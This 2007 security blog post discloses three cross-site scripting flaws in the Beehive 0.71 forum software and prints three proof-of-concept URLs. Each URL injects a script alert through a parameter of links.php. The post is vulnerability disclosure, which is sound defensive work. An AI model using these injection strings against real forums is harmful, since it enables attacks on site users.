Beehive Zero Vulnerabilities – Myth BUSTED

In the pursuit of accurate statements about application security, Ory Segal took a new shot at Beehive, the last bulletin board which I considered bug free in 2006. Well it didn’t take him long to find not one, not two but three new Beehive XSS vulnerabilities . I have installed Beehive 0.71 and indeed the vulnerabilities are confirmed.

/forum/links.php?webtag=FORUM_NAME&fid=1&viewmode=>"’><script>alert(1);</script>
/forum/links.php?webtag=FOEUM_NAME&fid=>"’><script>alert(1);</script>&viewmode=1
/forum/links.php?webtag=FORUM_NAME&fid=1&viewmode=0&page=1&sort_by=CREATED&sort_dir="><script>alert(1)</script>

What started as a quick secunia browsing for forum vulnerabilities turned into vulnerability assessments That was cool and maybe it’s a nice idea to continue these tests. I’ll post more on this topic.

Ory gets all the credit for this one and, again, I updated the forum vulnerabilities post .

So, in true MythBusters‘ style :
Zero vulnerabilities in any of the 10 most popular open source forums in 2006/2007 : Myth BUSTED

Thank you for reading this post. You can now Read Comment (1) or Leave A Trackback.

Print This Post

Post Info

This entry was posted on Sunday, June 10th, 2007 .

Tagged with: Vulnerabilities, Web Applications

You can follow any responses to this entry through the Comments Feed. You can Leave A Comment, or A Trackback.

Previous Post: NuFW 2.2 – An Authenticating Firewall »
Next Post: Online vs. Offline Gambling »

Related Reading:

Back to the Homepage

Latest Posts:

One Response to “Beehive Zero Vulnerabilities – Myth BUSTED”

1
Top 10 Open Source Forums - 12 Months of Vulnerabilities | Dragos Lungu Dot Com
June 10th, 2007 07:56

[...] BBPress : BBpress XSS Vulnerability Beehive : Beehive Zero Vulnerabilities – Myth BUSTED [...]

Note: Any comments are permitted only because the site owner is letting you post, and any comments will be removed for any reason at the absolute discretion of the site owner.